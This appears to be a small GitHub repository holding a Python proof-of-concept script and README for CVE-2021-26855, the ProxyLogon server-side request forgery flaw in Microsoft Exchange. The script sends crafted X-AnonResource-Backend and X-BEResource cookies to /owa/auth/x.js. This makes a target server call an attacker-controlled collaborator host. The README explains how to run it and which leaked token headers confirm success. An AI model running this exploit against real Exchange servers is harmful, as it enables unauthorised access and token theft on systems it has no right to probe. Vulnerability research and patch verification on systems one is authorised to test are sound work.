├── CVE-2021-26855.py
├── PoC.JPG
└── README.md


/CVE-2021-26855.py:
--------------------------------------------------------------------------------
 1 | from argparse import ArgumentParser
 2 | import requests,sys
 3 | 
 4 | parser= ArgumentParser(description="CVE-2021-26855 SSRF POC", epilog='CVE-2021-26855.py -H targetdomai.com -b burpcollab.net')
 5 | rparser = parser.add_argument_group('required argument')
 6 | rparser.add_argument('-H', '--host',type=str, help='target domain',required=True)
 7 | rparser.add_argument('-B', '--burpcollab', type=str, help='Collabrator Client', required=True )
 8 | args= parser.parse_args()
 9 | def main():
10 |   print(args.host)
11 |   print(args.burpcollab)
12 |   baseurl = 'https://'+ args.host+'/owa/auth/x.js'
13 |   rheaders= {
14 |   'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0'
15 |   }
16 | 
17 |   cookie= {'X-AnonResource':'true',
18 |   'X-AnonResource-Backend': args.burpcollab +'/ecp/default.flt?~3',
19 |   'X-BEResource':'localhost/owa/auth/logon.aspx?~3'
20 |   } 
21 | 
22 |   rget = requests.get(baseurl, headers=rheaders, cookies=cookie ,verify=False)
23 |   print(rget)
24 | 
25 | main()


--------------------------------------------------------------------------------
/PoC.JPG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pussycat0x/CVE-2021-26855-SSRF/1788b6aefee1435c57c3879e82ad415b900697cc/PoC.JPG


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2021-26855-SSRF-Poc
 2 | This script helps to identify  CVE-2021-26855  ssrf Poc
 3 | 
 4 | Reference: https://proxylogon.com/ 
 5 | 
 6 | ## Script usage
 7 | 
 8 | #### python CVE-2021-26855.py -H target.com -B xxxxxxxxxxxxxxxxxx.burpcollaborator.net
 9 | 
10 | ![PoC](https://github.com/pussycat0x/CVE-2021-26855-SSRF/blob/main/PoC.JPG)
11 | 
12 | If you are able to retrieve tokens through HTTPS request. then the target is vulnerable. otherwise, it will be a false positive.
13 | Check the following headers.
14 | X-SourceCafeServer:
15 | X-CommonAccessToken:
16 | 
17 | ![http request](https://user-images.githubusercontent.com/65701233/110593868-20ce2d00-81a2-11eb-8613-23470a22b40d.png)
18 | 


--------------------------------------------------------------------------------